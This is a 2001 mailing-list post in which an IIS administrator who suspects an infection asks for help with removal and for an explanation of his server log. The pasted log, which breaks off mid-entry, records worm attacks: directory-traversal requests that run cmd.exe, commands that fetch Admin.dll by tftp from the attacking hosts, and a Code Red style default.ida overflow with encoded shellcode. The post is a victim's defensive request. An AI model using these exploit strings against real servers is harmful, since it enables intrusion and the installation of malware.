[Snort-users] Infected? Help Me Find Out!

Jason Withrow jwithrow at ...422...
Tue Sep 18 17:59:01 EDT 2001


I had the admin.dll, but no root.exe or cmd.exe where it didn't belong.

No hacked-up explorer.exe's. I did have a ton of new regKeys, with 2
keys each:

DLLPatch-x  REG_SZ
X           REG_BINARY

And a new key called badApp as well.

Anyone know the complete removal process? I think I got it all, but who
knows.

Also, can someone look at my log here and make some sense out of it? It
looks like all requests didn't complete, but I can't really read these
things.

I started with the first request for C+dir. There are all sorts of
different codes returned: 404, 200, 503? I know 404 is not found; what
about the rest?

Thanks,

I attached the log as well to preserve text formatting as email has a
way of wrapping unreadably.

- Jason 

------- IIS LOG ------------------
2001-09-18 13:34:17 66.31.147.158 - 66.31.82.9 80 GET /scripts/root.exe
/c+dir 404 -
2001-09-18 13:34:17 66.31.147.158 - 66.31.82.9 80 GET /MSADC/root.exe
/c+dir 403 -
2001-09-18 13:34:19 66.31.147.158 - 66.31.82.9 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:34:19 66.31.147.158 - 66.31.82.9 80 GET
/d/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:34:20 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:34:45 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.147.158%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:35:27 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.147.158%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:35:53 66.31.70.112 - 66.31.82.9 80 GET /scripts/root.exe
/c+dir 404 -
2001-09-18 13:35:53 66.31.70.112 - 66.31.82.9 80 GET /MSADC/root.exe
/c+dir 403 -
2001-09-18 13:36:21 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.147.158%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:36:22 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:36:22 66.31.147.158 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:36:22 66.31.147.158 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.147.158%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:36:32 66.31.147.158 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.147.158%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:36:32 66.31.147.158 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.147.158%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:36:34 66.31.147.158 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../Admin.dll - 500 -
2001-09-18 13:36:34 66.31.147.158 - 66.31.82.9 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:36:35 66.31.147.158 - 66.31.82.9 80 GET
/msadc/..%5c../..%5c../..%5c/..Á
../..Á
../..Á
../winnt/system32/cmd.exe
/c+dir 403 -
2001-09-18 13:36:35 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..Á
../winnt/system32/cmd.exe /c+dir 500 -
2001-09-18 13:36:35 66.31.147.158 - 66.31.82.9 80 GET
/scripts/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:36:37 66.31.147.158 - 66.31.82.9 80 GET
/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:36:37 66.31.147.158 - 66.31.82.9 80 GET
/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:36:48 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:36:48 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.147.158%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:36:58 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.147.158%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:37:09 66.31.222.89 - 66.31.82.9 80 GET /scripts/root.exe
/c+dir 404 -
2001-09-18 13:37:14 66.31.222.89 - 66.31.82.9 80 GET /MSADC/root.exe
/c+dir 403 -
2001-09-18 13:37:15 66.31.222.89 - 66.31.82.9 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:37:17 66.31.222.89 - 66.31.82.9 80 GET
/d/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:37:45 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.147.158%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:37:45 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:37:46 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:37:50 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.147.158%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:37:50 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.147.158%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:37:50 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.147.158%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:37:51 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:37:51 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:37:53 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.147.158%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:38:03 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.147.158%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:38:03 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.147.158%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:38:07 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:38:07 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:38:09 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.147.158%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:38:09 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.147.158%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:38:11 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.147.158%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:38:11 66.31.147.158 - 66.31.82.9 80 GET
/scripts/..%2f../Admin.dll - 500 -
2001-09-18 13:39:45 149.225.83.203 - 66.31.82.9 80 GET /default.ida
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb
d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00
=a 302 -
2001-09-18 13:41:41 66.31.135.215 - 66.31.82.9 80 GET /scripts/root.exe
/c+dir 404 -
2001-09-18 13:41:41 66.31.135.215 - 66.31.82.9 80 GET /MSADC/root.exe
/c+dir 403 -
2001-09-18 13:41:41 66.31.135.215 - 66.31.82.9 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:41:41 66.31.135.215 - 66.31.82.9 80 GET
/d/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:41:41 66.31.135.215 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:41:41 66.31.135.215 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.135.215%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:41:42 66.31.135.215 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.135.215%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:43:05 66.31.95.161 - 66.31.82.9 80 GET /scripts/root.exe
/c+dir 404 -
2001-09-18 13:43:07 66.31.95.161 - 66.31.82.9 80 GET /MSADC/root.exe
/c+dir 403 -
2001-09-18 13:43:08 66.31.95.161 - 66.31.82.9 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:43:10 66.31.95.161 - 66.31.82.9 80 GET
/d/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:43:11 66.31.95.161 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:43:11 66.31.135.215 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:43:11 66.31.135.215 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.135.215%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:43:13 66.31.135.215 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.135.215%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:43:13 66.31.135.215 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.135.215%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:43:13 66.31.135.215 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../Admin.dll - 500 -
2001-09-18 13:43:13 66.31.95.161 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.95.161%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:43:13 66.31.135.215 - 66.31.82.9 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:43:13 66.31.135.215 - 66.31.82.9 80 GET
/msadc/..%5c../..%5c../..%5c/..Á
../..Á
../..Á
../winnt/system32/cmd.exe
/c+dir 403 -
2001-09-18 13:43:13 66.31.135.215 - 66.31.82.9 80 GET
/scripts/..Á
../winnt/system32/cmd.exe /c+dir 500 -
2001-09-18 13:43:14 66.31.135.215 - 66.31.82.9 80 GET
/scripts/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:43:14 66.31.135.215 - 66.31.82.9 80 GET
/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:43:14 66.31.135.215 - 66.31.82.9 80 GET
/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:43:15 66.31.135.215 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:43:15 66.31.135.215 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.135.215%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:43:15 66.31.135.215 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.135.215%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:43:18 66.31.95.161 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.95.161%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:43:42 66.31.114.15 - 66.31.82.9 80 GET /scripts/root.exe
/c+dir 404 -
2001-09-18 13:43:42 66.31.114.15 - 66.31.82.9 80 GET /MSADC/root.exe
/c+dir 403 -
2001-09-18 13:43:42 66.31.114.15 - 66.31.82.9 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:43:42 66.31.114.15 - 66.31.82.9 80 GET
/d/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:43:42 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:43:42 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.114.15%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:43:42 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.114.15%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:43:49 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.114.15%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:43:49 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:43:49 66.31.114.15 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:43:49 66.31.114.15 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.114.15%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:43:49 66.31.114.15 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.114.15%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:43:49 66.31.114.15 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.114.15%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:43:49 66.31.114.15 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../Admin.dll - 500 -
2001-09-18 13:43:49 66.31.114.15 - 66.31.82.9 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:43:49 66.31.114.15 - 66.31.82.9 80 GET
/msadc/..%5c../..%5c../..%5c/..Á
../..Á
../..Á
../winnt/system32/cmd.exe
/c+dir 403 -
2001-09-18 13:43:49 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..Á
../winnt/system32/cmd.exe /c+dir 500 -
2001-09-18 13:43:49 66.31.114.15 - 66.31.82.9 80 GET
/scripts/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:43:49 66.31.114.15 - 66.31.82.9 80 GET
/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:43:53 66.31.114.15 - 66.31.82.9 80 GET
/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:43:53 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:43:53 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.114.15%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:43:53 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.114.15%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:43:53 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.114.15%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:43:53 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:43:53 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:43:53 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.114.15%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:43:53 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.114.15%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:43:59 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.114.15%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:43:59 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:43:59 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:43:59 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.114.15%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:43:59 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.114.15%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:43:59 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.114.15%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:43:59 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:43:59 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:43:59 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.114.15%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:44:00 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.114.15%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:44:00 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.114.15%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:44:00 66.31.114.15 - 66.31.82.9 80 GET
/scripts/..%2f../Admin.dll - 500 -
2001-09-18 13:44:45 66.31.135.215 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:44:45 66.31.135.215 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.135.215%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:44:45 66.31.135.215 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.135.215%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:44:56 66.31.47.252 - 66.31.82.9 80 GET /scripts/root.exe
/c+dir 404 -
2001-09-18 13:44:58 66.31.47.252 - 66.31.82.9 80 GET /MSADC/root.exe
/c+dir 403 -
2001-09-18 13:45:08 66.31.47.252 - 66.31.82.9 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:45:13 66.31.94.77 - 66.31.82.9 80 GET /scripts/root.exe
/c+dir 404 -
2001-09-18 13:45:13 66.31.94.77 - 66.31.82.9 80 GET /MSADC/root.exe
/c+dir 403 -
2001-09-18 13:45:13 66.31.94.77 - 66.31.82.9 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:45:13 66.31.94.77 - 66.31.82.9 80 GET
/d/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:45:13 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:45:13 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:45:13 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:45:29 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:45:29 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:45:29 66.31.94.77 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:45:29 66.31.94.77 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:45:33 66.31.94.77 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:45:33 66.31.94.77 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:45:33 66.31.94.77 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../Admin.dll - 500 -
2001-09-18 13:45:33 66.31.94.77 - 66.31.82.9 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:45:33 66.31.94.77 - 66.31.82.9 80 GET
/msadc/..%5c../..%5c../..%5c/..Á
../..Á
../..Á
../winnt/system32/cmd.exe
/c+dir 403 -
2001-09-18 13:45:33 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..Á
../winnt/system32/cmd.exe /c+dir 500 -
2001-09-18 13:45:33 66.31.94.77 - 66.31.82.9 80 GET
/scripts/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:45:33 66.31.94.77 - 66.31.82.9 80 GET
/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:45:34 66.31.94.77 - 66.31.82.9 80 GET
/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:45:34 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:45:34 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:45:34 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:45:38 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:45:38 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:45:38 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:45:38 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:45:38 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:45:55 66.31.135.215 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.135.215%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:45:56 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:46:00 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:46:00 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:46:01 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:46:01 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:46:01 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:46:01 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:46:01 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:46:01 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:46:11 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:46:11 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:46:16 66.31.135.215 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:46:16 66.31.135.215 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.135.215%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:46:16 66.31.135.215 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.135.215%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:46:21 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%2f../Admin.dll - 500 -
2001-09-18 13:47:09 66.31.25.7 - 66.31.82.9 80 GET /scripts/root.exe
/c+dir 404 -
2001-09-18 13:47:13 66.31.25.7 - 66.31.82.9 80 GET /MSADC/root.exe
/c+dir 403 -
2001-09-18 13:47:13 66.31.25.7 - 66.31.82.9 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:47:13 66.31.25.7 - 66.31.82.9 80 GET
/d/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:47:17 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:47:17 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.25.7%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:47:17 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.25.7%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:47:18 66.31.25.7 - 66.31.82.9 80 GET
